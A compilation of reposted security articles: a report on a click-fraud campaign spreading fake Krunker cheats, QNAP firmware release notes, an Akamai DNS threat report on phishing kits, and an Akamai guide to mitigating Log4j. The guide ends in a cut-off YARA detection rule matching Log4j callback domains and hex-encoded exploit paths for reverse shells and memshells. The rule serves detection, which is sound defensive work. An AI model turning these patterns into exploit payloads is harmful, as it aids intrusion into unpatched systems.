Microsoft Warns of Large-Scale Click Fraud Campaign Targeting Gamers

Microsoft said it’s tracking an ongoing large-scale click fraud campaign targeting gamers by means of stealthily deployed browser extensions on compromised systems.

“[The] attackers monetize clicks generated by a browser node-webkit or malicious browser extension secretly installed on devices,” Microsoft Security Intelligence said in a sequence of tweets over the weekend.

The tech giant’s cybersecurity division is tracking the developing threat cluster under the name DEV-0796.

CyberSecurity

Attach chains mounted by the adversary commence with an ISO file that’s downloaded onto a victim’s machine upon clicking on a malicious ad or comments on YouTube. The ISO file, when opened, is designed to install a browser node-webkit (aka NW.js) or rogue browser extension.

Click Fraud Campaign

It’s worth noting that the ISO file masquerades as hacks and cheats for the Krunker first-person shooter game. Cheats are programs that help gamers gain an added advantage beyond the available capabilities during gameplay.

Also used in the attacks are DMG files, which are Apple Disk Image files primarily used to distribute software on macOS, indicating that the threat actors are targeting multiple operating systems.

CyberSecurity

The findings arrive as Kaspersky disclosed details of another campaign that lures gamers looking for cheats on YouTube into downloading self-propagating malware capable of installing crypto miners and other information stealers.

“Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers’ security, especially for those who are keen on popular game series,” the Russian cybersecurity firm said in a recent report.

Source :
https://thehackernews.com/2022/09/microsoft-warns-of-large-scale-click.html

Qnap QTS 5.0.1.2145 build 20220903

2022-09-15

Applicable Models

  • HS-251+,S2
  • QMiroPlus-201W
  • Mustang-F100,Mustang-V100,Mustang-200-i7-1T-32G-R10,Mustang-200-i5-1T-32G-R10,Mustang-200-C-8G-R10,Mustang-200
  • QBoat Sunny
  • QGD-1600P
  • QGD-1602P
  • QGD-3014-16PT
  • TS-453S Pro,TS-853S Pro
  • TS-531P
  • TS-216,TS-416
  • TS-128A,TS-228A,TS-212P3,TS-130,D1 Rev-B
  • TS-231P3,TS-431P3
  • TS-231P2,TS-431P2
  • TS-831X,TS-531X,TS-431X,TS-431X2,TS-431X3,TS-431KX
  • TS-431XU,TS-831XU,TS-1231XU,TS-431XU-RP,TS-831XU-RP,TS-1231XU-RP,TS-431XeU
  • TS-932X,TS-832X,TS-332X,TS-532X,TS-932PX,TS-832PX
  • TS-432XU-RP,TS-432XU,TS-832XU-RP,TS-832XU,TS-1232XU-RP,TS-1232XU,TS-432PXU,TS-432PXU-RP,TS-832PXU,TS-832PXU-RP,TS-1232PXU,TS-1232PXU-RP
  • TS-133,TS-233,TS-433
  • TS-1635
  • TS-1635AX
  • TS-435XeU
  • TS-231+,TS-431+,TS-131P,TS-231P,TS-431P,TS-131K,TS-231K,TS-431K,D2,D4,D4 Rev-B
  • TS-251,TS-451,TS-651,TS-851,TS-451S,TS-251+,TS-451+,TS-351,D2 Pro Rev-B,D4 Pro Rev-B
  • TS-251A,TS-451A,D2 Pro,D4 Pro
  • TS-251B
  • TS-451DeU,TS-453DU,TS-453DU-RP,TS-853DU-RP,TS-1253DU-RP
  • TS-451U
  • TS-253 Pro,TS-453 Pro,TS-653 Pro,TS-853 Pro,TS-453mini,IS-453S
  • TS-453Bmini,TS-253B,TS-453B,TS-653B,TS-253Be,TS-453Be,TS-453BT3
  • TS-853BU,TS-853BU-RP,TS-1253BU,TS-1253BU-RP,TS-453BU,TS-453BU-RP
  • HS-453DX,TBS-453DX,TS-251D,TS-253D,TS-653D,TS-453D,TS-451D,TS-453Dmini,TS-451D2
  • TBS-453A,TS-253A,TS-453A,TS-653A,TS-853A,D6 Pro,D8 Pro
  • TS-453U,TS-853U,TS-1253U,TS-453U-RP,TS-853U-RP,TS-1253U-RP,R4
  • TVS-463,TVS-663,TVS-863,TVS-863+,TS-563,TS-963X,TS-963N
  • TS-463U,TS-463U-RP,TS-863U,TS-863U-RP,TS-1263U,TS-1263U-RP,TS-463XU,TS-463XU-RP,TS-863XU,TS-863XU-RP,TS-1263XU,TS-1263XU-RP
  • TS-564,HS-264,TBS-464,TS-262C,TS-462C,TS-264C,TS-464C,TS-364,TS-464,TS-664
  • TS-464U,TS-464U-RP,TS-1264U-RP,TS-464eU,TS-864eU,TS-864eU-RP
  • TVS-471,TVS-671,TVS-871,TVS-871T
  • TVS-871U-RP,TVS-1271U-RP,TVS-471U-RP,TVS-471U,R8
  • TVS-672N,TVS-872N,TVS-872X,TVS-672X,TVS-472X,TVS-472XT,TVS-672XT,TVS-872XT
  • TVS-872XU,TVS-872XU-RP,TVS-1272XU-RP,TVS-1672XU-RP,TVS-2472XU-RP,TVS-972XU,TVS-972XU-RP
  • TVS-473,TVS-673,TVS-873,TVS-473e,TVS-673e,TVS-873e
  • TS-h973AX,TS-473A,TS-673A,TS-873A
  • TS-873AU,TS-873AU-RP,TS-1273AU-RP,TS-1673AU-RP,TS-873AeU,TS-873AeU-RP
  • TS-873U,TS-1273U,TS-1673U,TS-873U-RP,TS-1273U-RP,TS-1673U-RP
  • TVS-675
  • TVS-h875U,TVS-h875U-RP,TVS-h1275U-RP,TVS-h1675U-RP
  • TS-1277,TS-877,TS-677,TS-1677X
  • TS-877XU,TS-877XU-RP,TS-1277XU-RP,TS-1677XU-RP,TS-2477XU-RP,TS-977XU-RP,TS-977XU,TS-h1277XU-RP,TS-h977XU-RP,TS-h1677XU-RP,TS-h2477XU-RP
  • TS-EC880 Pro,TS-EC1080 Pro,TVS-EC880,TVS-EC1080,TVS-EC1080+
  • TS-EC880U,TS-EC1280U,TS-EC1680U,TS-EC2480U R2,TVS-EC1280U-SAS-RP R2,TVS-EC1580MU-SAS-RP R2,TVS-EC1680U-SAS-RP R2,TVS-EC2480U-SAS-RP R2,TS-EC2480U,TS-EC880U R2,TS-EC1280U R2,TS-EC1680U R2,TVS-EC1280U-SAS-RP,TVS-EC1580MU-SAS-RP,TVS-EC1680U-SAS-RP,TVS-EC2480U-SAS-RP,R12,R16,R24
  • TVS-682,TVS-882,TVS-1282,TVS-882BR,TVS-882T,TVS-1282T,TVS-682T,TVS-1282T3,TVS-882BRT3
  • TVS-1582TU
  • TS-883XU,TS-883XU-RP,TS-1283XU-RP,TS-1683XU-RP,TS-983XU,TS-983XU-RP,TS-2483XU-RP,TS-h1283XU-RP,TS-h2483XU-RP,TS-h1683XU-RP
  • TS-1685,TS-h886,TS-h686
  • TES-3085U,TES-1885U,TS-1886XU-RP,TS-h1886XU-RP,TS-h1886XU-RP R2
  • TS-2888X,TVS-h1688X,TVS-h1288X
  • TS-h3088XU-RP
  • TDS-16489U
  • TS-h2490FU,TS-h1090FU
  • TS-328,TS-428,TS-230,D2 Rev-B
  • TS-551
  • TS-473,TS-673,TS-873
  • TVS-951X,TVS-951N
  • GM-1000,TNS-h1083X,TNS-h1083X (A Side),TNS-h1083X (B Side)
  • TS-i410X, TS-410E
  • TS-253E,TS-453E
  • TS-h1290FX
  • TVS-882ST,TVS-882ST3
  • TS-h987XU-RP,TS-h1887XU-RP,TS-h2287XU-RP,TS-h3087XU-RP
  • TVS-h474,TVS-h674,TVS-h874

Show less 

Important Notes

  • Out-of-the-box QTS 5.0.1 automatically installs security updates by default. Nevertheless, if you update the firmware from QTS 5.0.0 to 5.0.1, QTS will keep your existing firmware update settings. We recommend checking your firmware update settings in Control Panel > Firmware Update.
  • Removed support for the following developer tools: Node.js v4, Node.js v6, Node.js v8, and Ruby on Rails.
  • Removed support for the following apps or tools: Mono, Perl, and AlarmClock. We recommend running these apps or tools using Container Station if needed.
  • When a release candidate has proven to be stable enough for public use, we name this release candidate as an official release. You will not be notified again for official firmware update if you have already updated your system to this release candidate.

New Features

Control Panel
  • QTS now supports access protection settings for RTRR and Rsync protocols in Control Panel > System > Security.
  • Administrators can now enforce 2-step verification on specific users or groups and then check their current verification status. After this enforcement, selected users must complete 2-step verification setup before proceeding to other operations.
  • To ensure device security, you can now choose to disable USB ports to block all USB devices or only USB storage devices.
Desktop & Login
  • You can now configure the desktop icon size and font size in Desktop > Task Bar > Options >Wallpaper.
File Station
  • You can now share a shared folder via a share link.
Network & Virtual Switch
  • Network & Virtual Switch now displays MTU (Maximum Transmission Unit) values for network interfaces.
SAMBA
  • QTS now supports Microsoft Windows Search Protocol. This allows you to perform quick searches for files and folders in NAS shared folders mounted on Windows 10 via SMB.
Storage&Snapshots
  • Storage & Snapshots now displays topology diagrams for SAS JBOD expansion enclosures to help visualize the arrangement of your storage devices.
  • To ensure the availability of your data, Storage & Snapshots now supports “Replace & Detach”, which allows you to copy data from a faulty disk to a spare disk and then safely detach the faulty disk.
  • You can now use exFAT on ARM-based models without purchasing an exFAT license. Note that we have already added this support for x86-based models in an earlier update.
  • Added support for TCG-Enterprise SEDs. Storage & Snapshots can now display SED types.
  • Snapshot Replica now supports 2-step verification.
  • You can now specify a snapshot deletion policy in Storage & Snapshots > Global Settings.

Enhancement

Control Panel
  • Added an option to force users to change their password upon their first login.
  • Added the following features in Control Panel to optimize the mechanism and workflow of firmware updates:
    • Merged live update settings and auto update settings into a single user interface.
    • Enhanced notifications for firmware updates. Users can choose to postpone or cancel updates before the scheduled update time.
    • Introduced a new update type: important security updates. We recommend selecting this update type in auto update settings to ensure your device security.
  • QTS now displays a warning message in Control Panel > System > Hardware > Hardware Resources when you select a graphics card installed on a PCIe slot that does not support PCIe passthrough.
  • When importing users, you can now choose to require imported users to change their password upon their first login.
  • Shortened the waiting period for auto firmware updates. QTS now starts an auto update within only one hour from the scheduled time if a new firmware version is available for your device.
  • Administrators can now choose to receive notifications upon login if a recommended firmware update is available. (This feature is enabled by default).
  • The default UPS policy is now set to “auto-protection mode” after NAS initialization.
  • You can now create a one-time power schedule.
  • QTS now provides an option in Control Panel to disable the power button. This prevents unexpected shutdown when users press the power button by accident.
  • To prevent malicious usernames and to ensure device security, QTS no longer allows usernames that contain the following characters: { } $ and the space character.
File Station
  • File Station can now convert Apple iWork files to Microsoft Office formats with CloudConvert API v2.
  • Optimized the results of file name sorting for all languages. This helps deliver more consistent sorting results.
  • File Station now provides more information for background tasks to help you understand the detail, status, and progress of each task.
  • Share links now display file thumbnails and allow you to select and download multiple files at the same time. We have also enhanced the UI design to improve your file sharing experience.
Network & Virtual Switch
  • Upgraded jQuery to 3.5.1.
  • Improved the information for the system default gateway and NCSI (Network Connectivity Status Indicator) in Network & Virtual Switch to better explain their behaviors.
  • The TS-x77XU and TS-x83XU models can now update firmware for their network interface cards via Advanced Network Driver.
PHP System Module
  • Upgraded the built-in PHP version to 7.4.20.
SAMABA
  • Users can now enable SMB signing for NAS devices that do not join a domain. To enable this setting, go to Control Panel > Network & File Services > Win/Mac/NFS/WebDAV > Microsoft Networking > Advanced Options.
  • To prevent malware and ransomware from exploiting SMB v1 vulnerabilities, QTS now automatically sets the lowest SMB version to SMB v2 if your lowest SMB version is SMB v1 before this firmware update.
Storage&Snapshots
  • Updated Seagate IronWolf Health Management (IHM) to 2.1.1 to add support for the following drive models: IronWolf 525 SSD 2TB(ZP2000NM30002), IronWolf 525 SSD 1TB(ZP1000NM30002), IronWolf 525 SSD 500GB(ZP500NM30002), IronWolf 16TB(ST16000VN001), IronWolf 14TB(ST14000VN0008), IronWolf Pro 20TB(ST20000NE000), IronWolf 18TB(ST18000VN000), IronWolf 4TB(ST4000VN006).
  • Storage & Snapshots now supports zooming in on hardware model drawings to display component details.
  • Improved the user interface of Snapshot Replica to further enhance usability and user experience.
  • Storage & Snapshots now also displays Snapshot Replica information in Overview > Volume/LUN.

Fixed Issues

  • Fixed an issue where user storage quota would be reset to the default value after users restarted the NAS.

Known Issues

  • QTS and QuTS hero with newer kernel versions do not support ATTO Fibre Channel adapters. If you have already installed an ATTO Fibre Channel adapter on your device, we do not recommend updating the firmware to QTS 5.0.1 or QuTS hero h5.0.1 for the time being.
  • Thunderbolt connection between the NAS and Mac sometimes cannot automatically resume after users restart the NAS.
  • Users cannot connect to the destination NAS of a Snapshot Replica job if their usernames contain a space.
  • After waking up from sleep, the TS-x51 and TS-x53 models cannot detect external drives that do not support sleep mode.
  • Network connection issues may occur when users add both 10 GbE ports of the QXG-10G2SF-CX4 network expansion card to a virtual switch.
  • Users sometimes cannot switch between different FEC (Forward Error Correction) modes for the QXG-25G2SF-CX6LX network expansion card.
  • On some earlier NAS models with ARM processors, heavy I/O operations may cause network connection issues for the QNA-UC5G1T USB-to-Ethernet adapter.

Other Changes

App Center
  • In App Center, the option “Allow installation of applications without a valid digital signature” is now disabled by default after firmware update.
Control Panel
  • Removed certain device information from the login screen to enhance device security.
  • To ensure device security, the “admin” account cannot use the default password (the MAC address of the first network adapter) when changing the password.
Desktop & Login
  • Instead of using the generic alias “appuser”, QuLog Center and Desktop Dashboard now display actual usernames when users access system resources and services via a client app.
  • To enhance device security, the system now asks the “admin” user to change the password when the user logs in with the default password (the MAC address of the first network adapter).
License
  • You no longer need a license to operate QuTScloud installed in Virtualization Station. Note that License Center 1.7.5 (or later) is required for this change.
Storage&Snapshots
  • For a more intuitive workflow, Storage & Snapshots now shows various options (such as “Remove” and “Expand”) on the “Action” menu in Pool/Volume Management.
  • Storage & Snapshots now provides clearer information for the results of IronWolf Health Management (IHM) tests. This allows you to easily check the health of your IronWolf drives.
  • You can now quickly identify and repair volumes that may have potential issues after a power outage or an abnormal shutdown. In Storage & Snapshots > Overview, we now add a link that allows you to perform a file system check on such volumes.
  • VJBOD currently does not support encrypted LUNs.
  • Adjusted some settings in the Volume Creation Wizard to enhance user experience. Thin volume is now the default volume type for volume creation.

    Source :
    https://www.qnap.com/it-it/release-notes/qts/5.0.1.2145/20220903?ref=nas_product

Akamai’s Insights on DNS in Q2 2022

by Or Katz and Jim Black
Data analysis by Gal Kochner and Moshe Cohen

Executive summary

  • Akamai researchers have analyzed malicious DNS traffic from millions of devices to determine how corporate and personal devices are interacting with malicious domains, including phishing attacks, malware, ransomware, and command and control (C2).
  • Akamai researchers saw that 12.3% of devices used by home and corporate users communicated at least once to domains associated with malware or ransomware.
  • 63% of those users’ devices communicated with malware or ransomware domains, 32% communicated with phishing domains, and 5% communicated with C2 domains.
  • Digging further into phishing attacks, researchers found that users of financial services and high tech are the most frequent targets of phishing campaigns, with 47% and 36% of the victims, respectively.
  • Consumer accounts are the most affected by phishing, with 80.7% of the attack campaigns.
  • Tracking 290 different phishing toolkits being reused in the wild, and counting the number of distinct days each kit was reused over Q2 2022, shows that 1.9% of the tracked kits were reactivated on at least 72 days. In addition, 49.6% of the kits were reused for at least five days, demonstrating how many users are being revictimized multiple times. This shows how realistic-looking and dangerous these kits can be, even to knowledgeable users. 
  • The most used phishing toolkit in Q2 2022 (Kr3pto, a phishing campaign that targeted banking customers in the United Kingdom, which evades multi-factor authentication [MFA]) was hosted on more than 500 distinct domains.

Introduction

“It’s always DNS.” Although that is a bit of a tongue-in-cheek phrase in our industry, DNS can give us a lot of information about the threat landscape that exists today. By analyzing information from Akamai’s massive infrastructure, we are able to gain some significant insights on how the internet behaves. In this blog, we will explore these insights into traffic patterns, and how they affect people on the other end of the internet connection. 

Akamai traffic insights

Attacks by category

Based on Akamai’s range of visibility across different industries and geographies, we can see that 12.3% of protected devices attempted to reach out to domains that were associated with malware at least once during Q2 2022. This indicates that these devices might have been compromised. On the phishing and C2 front, we can see that 6.2% of devices accessed phishing domains and 0.8% of the devices accessed C2-associated domains. Although these numbers may seem insignificant, the scale here is in the millions of devices. When this is considered, along with the knowledge that C2 is the most malignant of threats, these numbers are not only significant, they’re cardinal.

Comparing 2022 Q2 results with 2022 Q1 results (Figure 1), we can see a minor increase in all categories in Q2. We attribute those increases to seasonal changes that are not associated with a significant change in the threat landscape.

Fig. 1: Devices exposed to threats — Q1 vs. Q2 Fig. 1: Devices exposed to threats — Q1 vs. Q2

In Figure 2, we can see that of the 12.3% potentially compromised devices, 63% were exposed to threats associated with malware activity, 32% with phishing, and 5% with C2. Access to malware-associated domains does not guarantee that these devices were actually compromised, but provides a strong indication of increased potential risk if the threat wasn’t properly mitigated. However, access to C2-associated domains indicates that the device is most likely compromised and is communicating with the C2 server. This can often explain why the incidence of C2 is lower when compared with malware numbers.

Fig. 2: Potentially compromised devices by category Fig. 2: Potentially compromised devices by category

Phishing attack campaigns 

By looking into the brands that are being abused and mimicked by phishing scams in Q2 2022, categorized by brand industry and number of victims, we can see that high tech and financial brands led with 36% and 47%, respectively (Figure 3). These leading phishing industry categories are consistent with Q1 2022 results, in which high tech and financial brands were the leading categories, with 32% and 31%, respectively. 

Fig. 3: Phishing victims and phishing campaigns by abused brands Fig. 3: Phishing victims and phishing campaigns by abused brands

When taking a different view on the phishing landscape–targeted industries by counting the number of attack campaigns being launched over Q2 2022, we can see that high tech and financial brands are still leading, with 36% and 41%, respectively (Figure 3). The correlation between leading targeted brands when it comes to number of attacks and number of victims is evidence that threat actors’ efforts and resources are, unfortunately, effectively working to achieve their desired outcome.

Akamai’s research does not have any visibility into the distribution channels used to deliver the monitored phishing attacks that led to victims clicking on a malicious link and ending up on the phishing landing page. Yet the strong correlation between different brand segments by number of attack campaigns and the number of victims seems to indicate that the volume of attacks is effective and leads to a similar trend in the number of victims. The correlation might also indicate that the distribution channels used have minimal effect on attack outcome, and it is all about the volume of attacks that lead to the desired success rates.

Taking a closer look at phishing attacks by categorization of attack campaigns — consumers vs. business targeted accounts— we can see that consumer attacks are the most dominant, with 80.7% of the attack campaigns (Figure 4). This domination is driven by the massive demand for consumers’ compromised accounts in dark markets that are then used to launch fraud-related second-phase attacks. However, even with only 19.3% of the attack campaigns, attacks against business accounts should not be considered marginal, as these kinds of attacks are usually more targeted and have greater potential for significant damage. Attacks that target business accounts may lead to a company’s network being compromised with malware or ransomware, or to confidential information being leaked. An attack that begins with an employee clicking a link in a phishing email can end up with the business suffering significant financial and reputational damages.

Fig. 4: Phishing targeted accounts — consumers vs. business  Fig. 4: Phishing targeted accounts — consumers vs. business

Phishing toolkits 

Phishing attacks are an extremely common vector that have been used for many years. The potential impacts and risks involved are well-known to most internet users. However, phishing is still a highly relevant and dangerous attack vector that affects thousands of people and businesses daily. Research conducted by Akamai explains some of the reasons for this phenomenon, and focuses on the phishing toolkits and their role in making phishing attacks effective and relevant. 

Phishing toolkits enable rapid and easy creation of fake websites that mimic known brands. Phishing toolkits enable even non–technically gifted scammers to run phishing scams, and in many cases are being used to create distributed and large-scale attack campaigns. The low cost and availability of these toolkits explains the increasing numbers of phishing attacks that have been seen in the past few years. 

According to Akamai’s research that tracked 290 different phishing toolkits being used in the wild, 1.9% of the tracked kits were reused on at least 72 distinct days over Q2 2022 (Figure 5). Further, 49.6% of the kits were reused for at least five days, and when looking into all the tracked kits, we can see that all of them were reused no fewer than three distinct days over Q2 2022.

Fig. 5: Phishing toolkits by number of reused days Q2 2022 Fig. 5: Phishing toolkits by number of reused days Q2 2022

The numbers showing the heavy reuse phenomenon of the observed phishing kits shed some light on the phishing threat landscape and the scale involved, creating an overwhelming challenge to defenders. Behind the reuse of phishing kits are factories and economic forces that drive the phishing landscape. Those forces include developers who create phishing kits that mimic known brands, later to be sold or shared among threat actors to be reused over and over again with very minimal effort.

Further analysis on the most reused kits in Q2 2022, counting the number of different domains used to deliver each kit, shows that the Kr3pto toolkit was the one most frequently used and was associated with more than 500 domains (Figure 6). The tracked kits are labeled by the name of the brand being abused or by a generic name representing the kit developer signature or kit functionality.

In the case of Kr3pto, the actor behind the phishing kit is a developer who builds and sells unique kits that target financial institutions and other brands. In some cases, these kits target financial firms in the United Kingdom, and they bypass MFA. This evidence also shows that this phishing kit that was initially created more than three years ago is still highly active and effective and being used intensively in the wild.

Fig. 6: Top 10 reused phishing toolkits  Fig. 6: Top 10 reused phishing toolkits

The phishing economy is growing, kits are becoming easier to develop and deploy, and the web is full of abandoned, ready-to-be-abused websites and vulnerable servers and services. Criminals capitalize on these weaknesses to establish a foothold that enables them to victimize thousands of people and businesses daily.

The growing industrial nature of phishing kit development and sales (in which new kits are developed and released within hours) and the clear split between creators and users means this threat isn’t going anywhere anytime soon. The threat posed by phishing factories isn’t just focused on the victims who risk having valuable accounts compromised and their personal information sold to criminals — phishing is also a threat to brands and their stakeholders.

The life span of a typical phishing domain is measured in hours, not days. Yet new techniques and developments by the phishing kit creators are expanding these life spans little by little, and it’s enough to keep the victims coming and the phishing economy moving. 

Summary

This type of research is necessary in the fight to keep our customers safer online. We will continue to monitor these threats and report on them to keep the industry informed.

The best way to stay up to date on this and other research pieces from the Akamai team is to follow Akamai Security Research on Twitter.

Source :
https://www.akamai.com/blog/security-research/q2-dns-akamai-insights

Mitigating Log4j Abuse Using Akamai Guardicore Segmentation

Executive summary

A critical remote code-execution vulnerability (CVE-2021-44228) has been publicly disclosed in Log4j, an open-source logging utility that’s used widely in applications, including many utilized by large enterprise organizations.

The vulnerability allows threat actors to exfiltrate information from, and execute malicious code on, systems running applications that utilize the library by manipulating log messages. There already are reports of servers performing internet-wide scans in attempts to locate vulnerable servers, and our threat intelligence teams are seeing attempts to exploit this vulnerability at alarming volumes. Log4j is incorporated into many popular frameworks and many Java applications, making the impact widespread.

Akamai Guardicore Segmentation is well positioned to address this vulnerability in different ways. It’s highly recommended that organizations update Log4j to its latest version- 2.16.0. Due to the rapidly escalating nature of this vulnerability, Akamai teams will continue to develop and deploy mitigation measures in order to support our customers.

As a follow up to Akamai’s recent post we wanted to provide more detail on how organizations can leverage  Akamai Guardicore Segmentation features to help address log4j exposure.

Log4j vulnerability: scope and impact

Log4j is a Java-based open-source logging library. On December 9, 2021, a critical vulnerability involving unauthenticated remote code execution (CVE-2021-44228) in Log4j was reported, causing concern due to how commonly Log4j is used. In addition to being used directly in a large multitude of applications, Log4j is also incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink.

Although Akamai first observed exploit attempts on the Log4j vulnerability on December 9th, following the widespread publication of the incident, we are now seeing evidence suggesting it could have been around for months. Since widespread publication of the vulnerability, we have seen multiple variants seeking to exploit this vulnerability, at a sustained volume of attack traffic at around 2M exploit requests per hour. The speed at which the variants are evolving is unprecedented.

A compromised machine would allow a threat actor to remotely provide a set of commands which Log4j executes. An attacker would have the ability to run arbitrary commands inside a server. This can allow an attacker to compromise a vulnerable system – including those that might be secured deep inside of a network with no direct access to the internet.

Akamai’s security teams have been monitoring attackers attempting to use Log4j in recent days. Other than the increase in attempted exploitation, Akamai researchers are also seeing attackers using a multitude of tools and attack techniques to get vulnerable components to log malicious content, in order to get remote code execution. This is indicative of threat actors’ ability to exploit a new vulnerability, and the worse the vulnerability is, the quicker they will act.

Mitigating Log4j abuse using Akamai Guardicore Segmentation

Customers using Akamai Guardicore Segmentation can leverage its deep, process level visibility to identify vulnerable applications and potential security risks in the environment. They can then use it to enact precise control over network traffic in order to stop attempted attacks on vulnerable systems, without disruptions to normal business operations. 

Guardicore Hunt customers have their environments monitored and investigated continuously by a dedicated team of security researchers. Alerts on security risks and suggested mitigation steps are immediately sent.

If you’d like to hear more about Akamai Guardicore Segmentation, read more or contact us.

What’s under threat: identify vulnerable Java processes and Log4j abuse

In order to protect against potential Log4j abuse, it is necessary to first identify potentially exploitable processes. This requires deep visibility into network traffic at the process level, which is provided by the Reveal and Insight features of Akamai Guardicore Segmentation. Precise visibility into internet connections and traffic at the process level allows us to see clearly what mitigation steps need to be taken, and visibility tools with historical data are pivotal in helping to prevent disruption to business operations.

Identify internet connected Java applications: using Reveal Explore Map, create a map for the previous week, and filter by java applications- such as tomcat, elastic, logstash- and by applications that have connections to/from the internet. Using this map, you can now see which assets are under potential threat. While this won’t yet identify Log4j applications, this can give you an idea of which machines to prioritize in your mitigation process.

Create a historical map to analyze normal communication patterns: using Reveal Explore Map, create a historical map of previous weeks (excluding the time since Log4j was reported) to view and learn normal communication patterns. Use this information to identify legitimate communications, and respond without disrupting the business. For example, a historical map might indicate what network connections exist under normal circumstances, those could be allowed, while other connections blocked or alerted on. Additionally, compare and contrast with a more recent map to identify anomalies.

Use reveal explore map to identify legitimate communications, and respond without disrupting the business.

Identify applications vulnerable to Log4j abuse: in the query section below, use Query 1 with Insight queries to identify assets that are running Java applications which have Log4j jar files in their directories. This query should return all Log4j packages in your environment, allowing you to assess and address any mitigation steps needed. To better prioritize exposed machines, cross reference the information with the Reveal Explore Map described previously.

Note that this query identifies Log4j packages that exist in the Java process current working directory or sub-directories.

Detect potential exploitation attempts in Linux logs: run an Insight query using YARA signature rule (Query 2, provided below in the query section) to search for known Log4j IoCs in the logs of linux machines. This can help you identify whether you’ve been attacked.

Note, a negative result does not necessarily mean that no attack exists, as this is only one of many indicators.

Stopping the attack: using Guardicore Segmentation to block malicious IoCs and attack vectors

It is imperative to be able to take action, once vulnerable applications have been identified. While patching is underway, Akamai Guardicore Segmentation offers a multitude of options for alerting on, stopping and preventing potential attacks. Critically, a solution with detailed and precise control over network communication and traffic is required to be able to surgically block or isolate attack vectors, with minimal to no disruption to normal business functions.

Automatically block IoC’s with Threat Intelligence Firewall (TIFW) and DNS Security: Akamai security teams are working around the clock to identify IPs and Domains used for Log4j exploitation. Customers who have these features turned on can expect a constantly updated list of IoCs to be blocked, preventing Log4j being used to download malicious payloads. Note that TIFW can be set to alert or block, please ensure it’s configured correctly. DNS Security is available from V41 onwards. The IoCs are also available on the Guardicore Threat Intel Repository and Guardicore Reputation Service.

Fully quarantine compromised servers: if compromised machines are identified during your investigation, use Akamai Guardicore Segmentation to isolate attacked/vulnerable servers from the rest of your network. Leverage built-in templates to easily enable deployment of segmentation policy to mitigate attacks.

Block inbound and outbound traffic to vulnerable assets: as a precautionary measure, you may also choose to block traffic to all machines identified with an unpatched version of Log4j, until patching is completed. Using a historical map of network traffic can help you limit the impact on business operations.

Create block rules for outgoing traffic from Java applications to the internet: if necessary, all internet-connected Java applications revealed in previous steps can be blocked from accessing the internet, as an additional precaution, until patching is complete.

Search queries

Query 1: To Identify assets that are running Java applications, which also have a Log4j jar file under their directories, run the following Insight query:

This query identifies assets that are running Java applications, which also have a Log4j jar file under their directories.

Query 2: To detect potential exploitation attempts, run an Insight query using YARA signature rules (our thanks to Florian Roth who published the original rule): 

SELECT path, count FROM yara WHERE path LIKE '/var/log/%%' AND sigrule = "rule EXPL_Log4j_CallBackDomain_IOCs_Dec21_1 {
strings:
$xr1 = /\b(ldap|rmi):\/\/([a-z0-9\.]{1,16}\.bingsearchlib\.com|[a-z0-9\.]{1,40}\.interact\.sh|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}):[0-9]{2,5}\/([aZ]|ua|Exploit|callback|[0-9]{10}|http443useragent|http80useragent)\b/
condition:
1 of them
}
rule EXPL_JNDI_Exploit_Patterns_Dec21_1 {
strings:
$ = {22 2F 42 61 73 69 63 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 42 61 73 69 63 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 42 61 73 69 63 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 65 74 74 79 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 6C 6F 67 69 63 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 4A 42 6F 73 73 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 57 65 62 73 70 68 65 72 65 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 42 61 73 69 63 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 55 52 4C 44 4E 53 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 31 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 43 6F 6C 6C 65 63 74 69 6F 6E 73 32 2F 43 6F 6D 6D 61 6E 64 2F 42 61 73 65 36 34 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 43 6F 6D 6D 6F 6E 73 42 65 61 6E 75 74 69 6C 73 31 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 44 65 73 65 72 69 61 6C 69 7A 61 74 69 6F 6E 2F 4A 72 65 38 75 32 30 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 44 6E 73 6C 6F 67 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 52 65 76 65 72 73 65 53 68 65 6C 6C 2F 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 54 6F 6D 63 61 74 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 54 6F 6D 63 61 74 42 79 70 61 73 73 2F 53 70 72 69 6E 67 4D 65 6D 73 68 65 6C 6C 22}
$ = {22 2F 47 72 6F 6F 76 79 42 79 70 61 73 73 2F 43 6F 6D 6D 61 6E 64 2F 22}
$ = {22 2F 57 65 62 73 70 68 65 72 65 42 79 70 61 73 73 2F 55 70 6C 6F 61 64 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
strings:
$xa1 = {22 68 65 61 64 65 72 20 77 69 74 68 20 76 61 6C 75 65 20 6F 66 20 42 61 64 41 74 74 72 69 62 75 74 65 56 61 6C 75 65 45 78 63 65 70 74 69 6F 6E 3A 20 22}
